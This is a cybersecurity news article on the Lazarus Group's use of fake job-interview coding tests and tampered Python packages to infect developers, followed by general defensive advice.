Developers Targeted in Fake Coding Tests from the Lazarus Group
In a world where the lines between opportunity and danger blur, even job interviews can become cyberattack vectors. Recently, cybersecurity experts uncovered a new wave of malicious activity aimed at software developers, carried out by the infamous North Korean-backed Lazarus Group. This time, they’re using fake coding tests to trick developers into unknowingly installing malware. Let’s break down what’s happening and how you can protect yourself.
Table of Contents
A New Kind of Cyber Threat: Fake Coding Assessments
If you're a developer on platforms like GitHub, LinkedIn, or even npm and PyPI, you may want to pay extra attention to any coding tests or job offers coming your way. The Lazarus Group, a well-known cybercrime organization, has started using fake job interviews to lure developers into downloading harmful Python packages. This strategy has been traced back to an ongoing campaign dubbed VMConnect, which began in August 2023.
Here’s how it works: A developer is approached for a "job opportunity" and asked to complete a coding challenge. Everything seems legitimate, but hidden within the coding test is malware designed to infiltrate the developer's system.
How They Operate and The Hidden Danger in Your Code
The Lazarus Group uses modified versions of legitimate Python packages like pyperclip and pyrebase to disguise their malicious intent. This malware hides in the Python package's files, specifically the __init__.py
file, and the corresponding compiled Python file (PYC). Once the developer runs the package, the malware contacts a command-and-control (C2) server to execute further commands—without the user even knowing.
To make matters worse, these malicious packages are often shared in the form of a ZIP file that requires quick action. For instance, one coding test asked job seekers to fix a Python code flaw within 15 minutes. The rush to meet this deadline can cause developers to skip important security checks, making it easy for the malware to activate unnoticed.
Real Targets, Big Names, Big Risks
One of the more disturbing aspects of this campaign is that the Lazarus Group is impersonating reputable financial institutions like Capital One and Rookery Capital Limited to make their scam more convincing. After initial conversations on LinkedIn, developers receive a ZIP file containing malware disguised as a coding test. For macOS users, this malware has been identified as COVERTCATCH, which can download even more malicious software designed to persist on the system.
While it’s unclear how many developers have been targeted so far, the method is becoming increasingly common. A report from Google’s cybersecurity firm Mandiant highlighted how these attacks often start with innocent-looking chat conversations on LinkedIn, followed by the malware-laden coding test.
A Global Threat from the Lazarus Group’s Broader Campaigns
The Lazarus Group isn’t limiting itself to software developers. They’ve also been linked to spear-phishing attacks targeting both Russia and South Korea. These attacks, codenamed CLOUD#REVERSER, have led to the distribution of malware like CURKON, a Windows shortcut file designed to download additional malware. They’ve even used RAT (Remote Access Trojan) tools like AsyncRAT and Lilith RAT to control infected systems remotely.
How Developers Can Stay Safe
- Be Skeptical of Job Offers: Especially if you’re approached through LinkedIn or other social media platforms, take the time to verify the legitimacy of the company and the person contacting you. Scammers often pose as recruiters from well-known companies.
- Always Review Code Before Running: No matter how urgent a coding test might seem, take a moment to review the source code before executing it. If you receive a ZIP file, scan it with an anti-malware tool before unzipping.
- Stay Informed About Threats: The techniques cybercriminals use evolve constantly, so staying informed is crucial. Follow cybersecurity news to know what to watch out for.
- Use Security Tools: Install trusted anti-malware software that can detect and block malicious scripts hidden in Python packages or other coding projects.
Vigilance is Key
The Lazarus Group’s use of fake coding assessments to spread malware highlights how cybercriminals are becoming more creative in their attacks. Developers, especially those eager to land their next job, are prime targets. But by taking a few extra precautions—like reviewing the source code, verifying recruiters, and staying updated on security risks—you can protect yourself and your systems.